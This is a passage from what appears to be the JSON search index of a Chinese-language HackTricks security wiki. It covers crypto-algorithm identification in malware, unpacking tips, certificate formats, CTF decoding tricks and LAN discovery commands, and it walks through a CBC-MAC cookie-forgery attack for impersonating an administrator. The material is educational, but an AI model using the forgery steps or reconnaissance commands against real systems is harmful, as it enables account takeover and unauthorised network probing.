(注意数字256作为计数器的使用,以及在256个字符的每个位置写入0的方式)"},"10061":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » 打乱阶段:","id":"10061","title":"打乱阶段:"},"10062":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » 异或阶段:","id":"10062","title":"异或阶段:"},"10063":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » AES (对称加密)","id":"10063","title":"AES (对称加密)"},"10064":{"body":"使用 替代盒和查找表 由于使用特定查找表值(常量),可以 区分AES 。 注意 常量 可以 存储 在二进制中 或动态 创建 。 加密密钥 必须 可被16整除 (通常为32B),并且通常使用16B的 IV 。","breadcrumbs":"Cryptographic/Compression Algorithms » 特点","id":"10064","title":"特点"},"10065":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » SBox 常量","id":"10065","title":"SBox 常量"},"10066":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » Serpent (对称加密)","id":"10066","title":"Serpent (对称加密)"},"10067":{"body":"很少发现某些恶意软件使用它,但有例子(Ursnif) 根据其长度(极长的函数)简单判断算法是否为Serpent","breadcrumbs":"Cryptographic/Compression Algorithms » 特点","id":"10067","title":"特点"},"10068":{"body":"在下图中注意常量 0x9E3779B9 的使用(注意该常量也被其他加密算法如 TEA - Tiny Encryption Algorithm使用)。 还要注意 循环的大小 ( 132 )和 反汇编 指令中的 异或操作 数量以及 代码 示例: 如前所述,这段代码可以在任何反编译器中可视化为 非常长的函数 ,因为其中 没有跳转 。反编译的代码可能看起来如下: 因此,可以通过检查 魔法数字 和 初始异或 来识别此算法,看到 非常长的函数 并 比较 一些 指令 与长函数的 实现 (如左移7和左旋转22)。","breadcrumbs":"Cryptographic/Compression Algorithms » 识别","id":"10068","title":"识别"},"10069":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » RSA (非对称加密)","id":"10069","title":"RSA (非对称加密)"},"1007":{"body":"钱包应避免使用在已经使用过的空地址上收到的币,以防止这种隐私泄露。","breadcrumbs":"Blockchain & Crypto » 正确的钱包行为","id":"1007","title":"正确的钱包行为"},"10070":{"body":"比对称算法更复杂 没有常量!(自定义实现难以确定) KANAL(一个加密分析器)未能显示RSA的提示,因为它依赖于常量。","breadcrumbs":"Cryptographic/Compression Algorithms » 特点","id":"10070","title":"特点"},"10071":{"body":"在第11行(左)有一个+7) >> 3,与第35行(右)相同:+7) / 8 第12行(左)检查modulus_len < 0x040,而第36行(右)检查inputLen+11 > modulusLen","breadcrumbs":"Cryptographic/Compression Algorithms » 通过比较识别","id":"10071","title":"通过比较识别"},"10072":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » MD5 & SHA(哈希)","id":"10072","title":"MD5 & SHA(哈希)"},"10073":{"body":"3个函数:Init、Update、Final 初始化函数相似","breadcrumbs":"Cryptographic/Compression Algorithms » 特点","id":"10073","title":"特点"},"10074":{"body":"Init 你可以通过检查常量来识别它们。注意sha_init有一个MD5没有的常量: MD5 Transform 注意使用了更多常量","breadcrumbs":"Cryptographic/Compression Algorithms » 识别","id":"10074","title":"识别"},"10075":{"body":"更小且更高效,因为其功能是查找数据中的意外更改 使用查找表(因此你可以识别常量)","breadcrumbs":"Cryptographic/Compression Algorithms » CRC(哈希)","id":"10075","title":"CRC(哈希)"},"10076":{"body":"检查 查找表常量 : 一个CRC哈希算法看起来像:","breadcrumbs":"Cryptographic/Compression Algorithms » 识别","id":"10076","title":"识别"},"10077":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » APLib(压缩)","id":"10077","title":"APLib(压缩)"},"10078":{"body":"没有可识别的常量 你可以尝试用python编写算法并在线搜索类似的东西","breadcrumbs":"Cryptographic/Compression Algorithms » 特点","id":"10078","title":"特点"},"10079":{"body":"图表相当大: 检查 3个比较以识别它 : tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Cryptographic/Compression Algorithms » 识别","id":"10079","title":"识别"},"1008":{"body":"确切的支付金额: 没有找零的交易很可能是在两个由同一用户拥有的地址之间进行的。 整数金额: 交易中的整数金额表明这是一次支付,而非整数输出很可能是找零。 钱包指纹识别: 不同的钱包具有独特的交易创建模式,允许分析师识别所使用的软件以及可能的找零地址。 金额与时间相关性: 公开交易时间或金额可能使交易可追踪。","breadcrumbs":"Blockchain & Crypto » 其他区块链分析技术","id":"1008","title":"其他区块链分析技术"},"10080":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 缺乏字符串 :常见的情况是打包的二进制文件几乎没有任何字符串 很多 未使用的字符串 :此外,当恶意软件使用某种商业打包工具时,常常会发现很多没有交叉引用的字符串。即使这些字符串存在,也并不意味着二进制文件没有被打包。 你还可以使用一些工具来尝试找出用于打包二进制文件的打包工具: PEiD Exeinfo PE Language 2000","breadcrumbs":"Cryptographic/Compression Algorithms » Unpacking binaries » 识别打包的二进制文件","id":"10080","title":"识别打包的二进制文件"},"10081":{"body":"从底部开始 分析打包的二进制文件 在 IDA 中向上移动 。解包器在解包代码退出时退出,因此解包器不太可能在开始时将执行传递给解包的代码。 搜索 JMP 或 CALL 到 寄存器 或 内存区域 。还要搜索 推送参数和地址方向的函数,然后调用 retn ,因为在这种情况下,函数的返回可能会调用在调用之前刚推送到堆栈的地址。 在 VirtualAlloc 上设置 断点 ,因为这会在内存中分配程序可以写入解包代码的空间。使用“运行到用户代码”或使用 F8 获取执行函数后 EAX 中的值 ,然后“ 跟踪转储中的地址 ”。你永远不知道这是否是解包代码将要保存的区域。 VirtualAlloc 的值 \\" 40 \\" 作为参数意味着可读+可写+可执行(一些需要执行的代码将被复制到这里)。 在解包 代码时,通常会发现 多个调用 到 算术操作 和像 memcopy 或 Virtual Alloc 这样的函数。如果你发现自己在一个显然只执行算术操作的函数中,可能还有一些 memcopy,建议尝试 找到函数的结束 (可能是 JMP 或调用某个寄存器) 或 至少找到 最后一个函数的调用 ,然后运行到那里,因为代码并不有趣。 在解包代码时 注意 每当你 更改内存区域 ,因为内存区域的变化可能表示 解包代码的开始 。你可以使用 Process Hacker 轻松转储内存区域(进程 --> 属性 --> 内存)。 在尝试解包代码时,知道你是否已经在处理解包代码的好方法(这样你可以直接转储它)是 检查二进制文件的字符串 。如果在某个时刻你执行了跳转(可能更改了内存区域),并且你注意到 添加了更多字符串 ,那么你可以知道 你正在处理解包的代码 。 然而,如果打包工具已经包含了很多字符串,你可以查看包含“http”这个词的字符串数量,看看这个数字是否增加。 当你从内存区域转储可执行文件时,可以使用 PE-bear 修复一些头部。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Cryptographic/Compression Algorithms » Unpacking binaries » 基本建议","id":"10081","title":"基本建议"},"10082":{"body":"Reading time: 11 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Certificates » 证书","id":"10082","title":"证书"},"10083":{"body":"一个 公钥证书 是在密码学中用于证明某人拥有公钥的数字身份。它包括密钥的详细信息、所有者的身份(主题)以及来自受信任机构(发行者)的数字签名。如果软件信任发行者并且签名有效,则可以与密钥的所有者进行安全通信。 证书主要由 证书颁发机构 (CAs) 在 公钥基础设施 (PKI) 设置中颁发。另一种方法是 信任网络 ,用户直接验证彼此的密钥。证书的常见格式是 X.509 ,可以根据 RFC 5280 中概述的特定需求进行调整。","breadcrumbs":"Certificates » 什么是证书","id":"10083","title":"什么是证书"},"10084":{"body":"","breadcrumbs":"Certificates » x509 常见字段","id":"10084","title":"x509 常见字段"},"10085":{"body":"在 x509 证书中,几个 字段 在确保证书的有效性和安全性方面发挥着关键作用。以下是这些字段的详细说明: 版本号 表示 x509 格式的版本。 序列号 在证书颁发机构(CA)系统中唯一标识证书,主要用于撤销跟踪。 主题 字段表示证书的所有者,可以是机器、个人或组织。它包括详细的身份识别,例如: 通用名称 (CN) :证书覆盖的域。 国家 (C) 、 地方 (L) 、 州或省 (ST, S, or P) 、 组织 (O) 和 组织单位 (OU) 提供地理和组织的详细信息。 区分名称 (DN) 概括了完整的主题识别。 发行者 详细说明了谁验证并签署了证书,包括与主题类似的子字段。 有效期 由 生效时间 和 失效时间 时间戳标记,确保证书在某个日期之前或之后不被使用。 公钥 部分对于证书的安全至关重要,指定公钥的算法、大小和其他技术细节。 x509v3 扩展 增强了证书的功能,指定 密钥使用 、 扩展密钥使用 、 主题备用名称 和其他属性,以微调证书的应用。 密钥使用和扩展 密钥使用 确定公钥的密码应用,例如数字签名或密钥加密。 扩展密钥使用 进一步缩小证书的使用案例,例如用于 TLS 服务器身份验证。 主题备用名称 和 基本约束 定义证书覆盖的其他主机名,以及它是否是 CA 证书或终端实体证书。 标识符如 主题密钥标识符 和 授权密钥标识符 确保密钥的唯一性和可追溯性。 授权信息访问 和 CRL 分发点 提供路径以验证发行 CA 并检查证书撤销状态。 CT 预证书 SCTs 提供透明日志,对于公众信任证书至关重要。 python # Example of accessing and using x509 certificate fields programmatically:\\nfrom cryptography import x509\\nfrom cryptography.hazmat.backends import default_backend # Load an x509 certificate (assuming cert.pem is a certificate file)\\nwith open(\\"cert.pem\\", \\"rb\\") as file:\\ncert_data = file.read()\\ncertificate = x509.load_pem_x509_certificate(cert_data, default_backend()) # Accessing fields\\nserial_number = certificate.serial_number\\nissuer = certificate.issuer\\nsubject = certificate.subject\\npublic_key = certificate.public_key() print(f\\"Serial Number: {serial_number}\\")\\nprint(f\\"Issuer: {issuer}\\")\\nprint(f\\"Subject: {subject}\\")\\nprint(f\\"Public Key: {public_key}\\")","breadcrumbs":"Certificates » x509 证书中的常见字段","id":"10085","title":"x509 证书中的常见字段"},"10086":{"body":"OCSP ( RFC 2560 ) 涉及客户端和响应者共同检查数字公钥证书是否已被撤销,而无需下载完整的 CRL 。这种方法比传统的 CRL 更高效,后者提供被撤销证书序列号的列表,但需要下载一个可能很大的文件。CRL 可以包含多达 512 个条目。更多细节可在 这里 找到。","breadcrumbs":"Certificates » OCSP与CRL分发点的区别","id":"10086","title":"OCSP与CRL分发点的区别"},"10087":{"body":"证书透明性通过确保 SSL 证书的发行和存在对域名所有者、CA 和用户可见,帮助抵御与证书相关的威胁。其目标包括: 防止 CA 在未通知域名所有者的情况下为域名发行 SSL 证书。 建立一个开放的审计系统,以跟踪错误或恶意发行的证书。 保护用户免受欺诈证书的影响。 证书日志 证书日志是公开可审计的、仅附加的证书记录,由网络服务维护。这些日志提供加密证明以供审计使用。发行机构和公众均可向这些日志提交证书或查询以进行验证。虽然日志服务器的确切数量并不固定,但预计全球不会超过一千个。这些服务器可以由 CA、ISP 或任何感兴趣的实体独立管理。 查询 要探索任何域的证书透明性日志,请访问 https://crt.sh/ 。 存储证书的不同格式各有其使用案例和兼容性。此摘要涵盖主要格式并提供转换指导。","breadcrumbs":"Certificates » 什么是证书透明性","id":"10087","title":"什么是证书透明性"},"10088":{"body":"","breadcrumbs":"Certificates » 格式","id":"10088","title":"格式"},"10089":{"body":"最广泛使用的证书格式。 需要为证书和私钥分别创建文件,采用 Base64 ASCII 编码。 常见扩展名:.cer, .crt, .pem, .key。 主要用于 Apache 和类似服务器。","breadcrumbs":"Certificates » PEM格式","id":"10089","title":"PEM格式"},"1009":{"body":"通过监控网络流量,攻击者可能将交易或区块与IP地址关联,从而危及用户隐私。如果一个实体运营多个比特币节点,这种情况尤其明显,因为这增强了他们监控交易的能力。","breadcrumbs":"Blockchain & Crypto » 流量分析","id":"1009","title":"流量分析"},"10090":{"body":"证书的二进制格式。 缺少 PEM 文件中找到的 \\"BEGIN/END CERTIFICATE\\" 语句。 常见扩展名:.cer, .der。 通常与 Java 平台一起使用。","breadcrumbs":"Certificates » DER格式","id":"10090","title":"DER格式"},"10091":{"body":"以 Base64 ASCII 存储,扩展名为 .p7b 或 .p7c。 仅包含证书和链证书,不包括私钥。 受 Microsoft Windows 和 Java Tomcat 支持。","breadcrumbs":"Certificates » P7B/PKCS#7格式","id":"10091","title":"P7B/PKCS#7格式"},"10092":{"body":"一种二进制格式,将服务器证书、中间证书和私钥封装在一个文件中。 扩展名:.pfx, .p12。 主要用于 Windows 的证书导入和导出。","breadcrumbs":"Certificates » PFX/P12/PKCS#12格式","id":"10092","title":"PFX/P12/PKCS#12格式"},"10093":{"body":"PEM 转换 对于兼容性至关重要: x509 到 PEM bash openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem PEM 转 DER bash openssl x509 -outform der -in certificatename.pem -out certificatename.der DER 转 PEM bash openssl x509 -inform der -in certificatename.der -out certificatename.pem PEM 转 P7B bash openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer PKCS7 转 PEM bash openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.pem PFX 转换 对于在 Windows 上管理证书至关重要: PFX 到 PEM bash openssl pkcs12 -in certificatename.pfx -out certificatename.pem PFX 转 PKCS#8 涉及两个步骤: 将 PFX 转换为 PEM bash openssl pkcs12 -in certificatename.pfx -nocerts -nodes -out certificatename.pem 将PEM转换为PKCS8 bash openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8 P7B 转 PFX 还需要两个命令: 将 P7B 转换为 CER bash openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer 将 CER 和私钥转换为 PFX bash openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer ASN.1 (DER/PEM) 编辑 (适用于证书或几乎任何其他 ASN.1 结构): 克隆 asn1template bash git clone https://github.com/wllm-rbnt/asn1template.git 将 DER/PEM 转换为 OpenSSL 的生成格式 bash asn1template/asn1template.pl certificatename.der > certificatename.tpl\\nasn1template/asn1template.pl -p certificatename.pem > certificatename.tpl 根据您的要求编辑 certificatename.tpl bash vim certificatename.tpl 重建修改后的证书 bash openssl asn1parse -genconf certificatename.tpl -out certificatename_new.der\\nopenssl asn1parse -genconf certificatename.tpl -outform PEM -out certificatename_new.pem tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Certificates » 格式转换","id":"10093","title":"格式转换"},"10094":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 如果 cookie 仅仅是 用户名 (或者cookie的第一部分是用户名),并且你想要冒充用户名“ admin ”。那么,你可以创建用户名**\\"bdmin\\" 并 暴力破解 cookie的 第一个字节**。","breadcrumbs":"Cipher Block Chaining CBC-MAC » CBC","id":"10094","title":"CBC"},"10095":{"body":"密码块链消息认证码 ( CBC-MAC )是一种用于密码学的方法。它通过逐块加密消息来工作,每个块的加密与前一个块相链接。这个过程创建了一个 块链 ,确保即使改变原始消息的一个比特,也会导致最后一个加密数据块的不可预测变化。要进行或逆转这样的变化,需要加密密钥,以确保安全性。 要计算消息m的CBC-MAC,可以在零初始化向量下以CBC模式加密m,并保留最后一个块。下图勾勒了使用秘密密钥k和块密码E计算由块组成的消息的CBC-MAC的过程 https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5 : https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC_structure_(en).svg/570px-CBC-MAC_structure_(en).svg.png","breadcrumbs":"Cipher Block Chaining CBC-MAC » CBC-MAC","id":"10095","title":"CBC-MAC"},"10096":{"body":"在CBC-MAC中,通常 使用的IV是0 。 这是一个问题,因为两个已知消息(m1和m2)独立生成两个签名(s1和s2)。所以: E(m1 XOR 0) = s1 E(m2 XOR 0) = s2 然后,由m1和m2连接而成的消息(m3)将生成两个签名(s31和s32): E(m1 XOR 0) = s31 = s1 E(m2 XOR s1) = s32 这可以在不知道加密密钥的情况下计算。 想象一下你在 8字节 块中加密名称 Administrator : Administ rator\\\\00\\\\00\\\\00 你可以创建一个名为 Administ (m1)的用户名并获取签名(s1)。 然后,你可以创建一个用户名,称为rator\\\\00\\\\00\\\\00 XOR s1的结果。这将生成E(m2 XOR s1 XOR 0),即s32。 现在,你可以将s32用作完整名称 Administrator 的签名。","breadcrumbs":"Cipher Block Chaining CBC-MAC » Vulnerability","id":"10096","title":"Vulnerability"},"10097":{"body":"获取用户名 Administ (m1)的签名,即s1 获取用户名 rator\\\\x00\\\\x00\\\\x00 XOR s1 XOR 0 的签名,即s32**。** 将cookie设置为s32,它将是用户 Administrator 的有效cookie。","breadcrumbs":"Cipher Block Chaining CBC-MAC » Summary","id":"10097","title":"Summary"},"10098":{"body":"如果你可以控制使用的IV,攻击可能会非常简单。 如果cookie仅仅是加密的用户名,要冒充用户“ administrator ”,你可以创建用户“ Administrator ”,你将获得它的cookie。 现在,如果你可以控制IV,你可以改变IV的第一个字节,使得 IV[0] XOR \\"A\\" == IV\'[0] XOR \\"a\\" ,并为用户 Administrator 重新生成cookie。这个cookie将有效地 冒充 用户 administrator ,使用初始 IV 。","breadcrumbs":"Cipher Block Chaining CBC-MAC » Attack Controlling IV","id":"10098","title":"Attack Controlling IV"},"10099":{"body":"更多信息请参见 https://en.wikipedia.org/wiki/CBC-MAC tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Cipher Block Chaining CBC-MAC » References","id":"10099","title":"References"},"101":{"body":"请注意, Discovering hosts from the outside ( TCP/HTTP/UDP/SCTP Port Discovery ) 中提到的技术也可以 在此应用 . 但是,由于你与其他主机处于 同一网络 ,你可以做 更多事情 : bash #ARP discovery\\nnmap -sn #ARP Requests (Discover IPs)\\nnetdiscover -r #ARP requests (Discover IPs) #NBT discovery\\nnbtscan -r 192.168.0.1/24 #Search in Domain # Bettercap\\nnet.probe on/off #Discover hosts on current subnet by probing with ARP, mDNS, NBNS, UPNP, and/or WSD\\nset net.probe.mdns true/false #Enable mDNS discovery probes (default=true)\\nset net.probe.nbns true/false #Enable NetBIOS name service discovery probes (default=true)\\nset net.probe.upnp true/false #Enable UPNP discovery probes (default=true)\\nset net.probe.wsd true/false #Enable WSD discovery probes (default=true)\\nset net.probe.throttle 10 #10ms between probes sent (default=10) #IPv6\\nalive6 # Send a pingv6 to multicast.","breadcrumbs":"Pentesting Network » 主动","id":"101","title":"主动"},"1010":{"body":"有关隐私攻击和防御的全面列表,请访问 Bitcoin Privacy on Bitcoin Wiki 。","breadcrumbs":"Blockchain & Crypto » 更多","id":"1010","title":"更多"},"10100":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Crypto CTFs Tricks » Crypto CTFs Tricks","id":"10100","title":"Crypto CTFs Tricks"},"10101":{"body":"谷歌一下 http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240 https://www.onlinehashcrack.com/ https://crackstation.net/ https://md5decrypt.net/ https://www.onlinehashcrack.com https://gpuhash.me/ https://hashes.org/search.php https://www.cmd5.org/ https://hashkiller.co.uk/Cracker/MD5 https://www.md5online.org/md5-decrypt.html","breadcrumbs":"Crypto CTFs Tricks » 在线哈希数据库","id":"10101","title":"在线哈希数据库"},"10102":{"body":"https://github.com/Ciphey/Ciphey https://gchq.github.io/CyberChef/ (魔法模块) https://github.com/dhondta/python-codext https://www.boxentriq.com/code-breaking","breadcrumbs":"Crypto CTFs Tricks » 魔法自动解码器","id":"10102","title":"魔法自动解码器"},"10103":{"body":"大多数编码数据可以通过这两个资源解码: https://www.dcode.fr/tools-list https://gchq.github.io/CyberChef/","breadcrumbs":"Crypto CTFs Tricks » 编码器","id":"10103","title":"编码器"},"10104":{"body":"https://www.boxentriq.com/code-breaking/cryptogram https://quipqiup.com/ - 非常好! 凯撒 - ROTx 自动解码器 https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript Atbash 密码 http://rumkin.com/tools/cipher/atbash.php","breadcrumbs":"Crypto CTFs Tricks » 替换自动解码器","id":"10104","title":"替换自动解码器"},"10105":{"body":"使用: https://github.com/dhondta/python-codext 检查所有这些基础 Ascii85 BQ%]q@psCd@rH0l Base26 [ A-Z ] BQEKGAHRJKHQMVZGKUXNT Base32 [ A-Z2-7= ] NBXWYYLDMFZGCY3PNRQQ==== Zbase32 [ ybndrfg8ejkmcpqxot1uwisza345h769 ] pbzsaamdcf3gna5xptoo==== Base32 Geohash [ 0-9b-hjkmnp-z ] e1rqssc3d5t62svgejhh==== Base32 Crockford [ 0-9A-HJKMNP-TV-Z ] D1QPRRB3C5S62RVFDHGG==== Base32 Extended Hexadecimal [ 0-9A-V ] D1NMOOB3C5P62ORFDHGG==== Base45 [ 0-9A-Z $%*+-./: ] 59DPVDGPCVKEUPCPVD Base58 (bitcoin) [ 1-9A-HJ-NP-Za-km-z ] 2yJiRg5BF9gmsU6AC Base58 (flickr) [ 1-9a-km-zA-HJ-NP-Z ] 2YiHqF5bf9FLSt6ac Base58 (ripple) [ rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz ] pyJ5RgnBE9gm17awU Base62 [ 0-9A-Za-z ] g2AextRZpBKRBzQ9 Base64 [ A-Za-z0-9+/= ] aG9sYWNhcmFjb2xh Base67 [ A-Za-z0-9- .!~_] NI9JKX0cSUdqhr!p Base85 (Ascii85) [ !\\"#$%&\'()*+,-./0-9:;<=>?@A-Z[\\\\]^_`a-u ] BQ%]q@psCd@rH0l Base85 (Adobe) [ !\\"#$%&\'()*+,-./0-9:;<=>?@A-Z[\\\\]^_`a-u ] <~BQ%]q@psCd@rH0l~> Base85 (IPv6 or RFC1924) [ 0-9A-Za-z!#$%&()*+-;<=>?@^ `{|}~_] Xm4yV_|Y(V{dF>` Base85 (xbtoa) [ !\\"#$%&\'()*+,-./0-9:;<=>?@A-Z[\\\\]^_`a-u ] xbtoa Begin\\\\nBQ%]q@psCd@rH0l\\\\nxbtoa End N 12 c E 1a S 4e6 R 6991d Base85 (XML) [_0-9A-Za-y!#$()*+,-./:;=?@^`{|}~z__] Xm4y|V{~Y+V}dF? Base91 [ A-Za-z0-9!#$%&()*+,./:;<=>?@[]^_`{|}~\\" ] frDg[*jNN!7&BQM Base100 [] 👟👦👣👘👚👘👩👘👚👦👣👘 Base122 [] 4F ˂r0Xmvc ATOM-128 [ /128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC ] MIc3KiXa+Ihz+lrXMIc3KbCC HAZZ15 [ HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5 ] DmPsv8J7qrlKEoY7 MEGAN35 [ 3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5 ] kLD8iwKsigSalLJ5 ZONG22 [ ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2 ] ayRiIo1gpO+uUc7g ESAB46 [] 3sHcL2NR8WrT7mhR MEGAN45 [] kLD8igSXm2KZlwrX TIGO3FX [] 7AP9mIzdmltYmIP9mWXX TRIPO5 [] UE9vSbnBW6psVzxB FERON74 [] PbGkNudxCzaKBm0x GILA7 [] D+nkv8C1qIKMErY1 Citrix CTX1 [] MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html - 404 Dead: https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html","breadcrumbs":"Crypto CTFs Tricks » 基础编码自动解码器","id":"10105","title":"基础编码自动解码器"},"10106":{"body":"╫☐↑Λ↻Λ┏Λ↻☐↑Λ http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html - 404 死链: https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html","breadcrumbs":"Crypto CTFs Tricks » HackerizeXS [ ╫Λ↻├☰┏ ]","id":"10106","title":"HackerizeXS [ ╫Λ↻├☰┏ ]"},"10107":{"body":".... --- .-.. -.-. .- .-. .- -.-. --- .-.. .- http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html - 404 死链接: https://gchq.github.io/CyberChef/","breadcrumbs":"Crypto CTFs Tricks » 摩尔斯","id":"10107","title":"摩尔斯"},"10108":{"body":"begin 644 webutils_pl\\nM2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(\\nM3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/\\nF3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$$`\\n`\\nend http://www.webutils.pl/index.php?idx=uu","breadcrumbs":"Crypto CTFs Tricks » UUencoder","id":"10108","title":"UUencoder"},"10109":{"body":"begin 644 webutils_pl\\nhG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236\\n5Hol-G2xAEE++\\nend www.webutils.pl/index.php?idx=xx","breadcrumbs":"Crypto CTFs Tricks » XXEncoder","id":"10109","title":"XXEncoder"},"1011":{"body":"","breadcrumbs":"Blockchain & Crypto » 匿名比特币交易","id":"1011","title":"匿名比特币交易"},"10110":{"body":"=ybegin line=128 size=28 name=webutils_pl\\nryvkryvkryvkryvkryvkryvkryvk\\n=yend size=28 crc32=35834c86 http://www.webutils.pl/index.php?idx=yenc","breadcrumbs":"Crypto CTFs Tricks » YEncoder","id":"10110","title":"YEncoder"},"10111":{"body":"(This file must be converted with BinHex 4.0)\\n:#hGPBR9dD@acAh\\"X!$mr2cmr2cmr!!!!!!!8!!!!!-ka5%p-38K26%&)6da\\"5%p\\n-38K26%\'d9J!!: http://www.webutils.pl/index.php?idx=binhex","breadcrumbs":"Crypto CTFs Tricks » BinHex","id":"10111","title":"BinHex"},"10112":{"body":"<~85DoF85DoF85DoF85DoF85DoF85DoF~> http://www.webutils.pl/index.php?idx=ascii85","breadcrumbs":"Crypto CTFs Tricks » ASCII85","id":"10112","title":"ASCII85"},"10113":{"body":"drnajapajrna https://www.geocachingtoolbox.com/index.php?lang=en&page=dvorakKeyboard","breadcrumbs":"Crypto CTFs Tricks » Dvorak 键盘","id":"10113","title":"Dvorak 键盘"},"10114":{"body":"字母对应其数字值 8 15 12 1 3 1 18 1 3 15 12 1","breadcrumbs":"Crypto CTFs Tricks » A1Z26","id":"10114","title":"A1Z26"},"10115":{"body":"字母到数字 (ax+b)%26 ( a 和 b 是密钥, x 是字母) 并将结果转换回字母 krodfdudfrod","breadcrumbs":"Crypto CTFs Tricks » 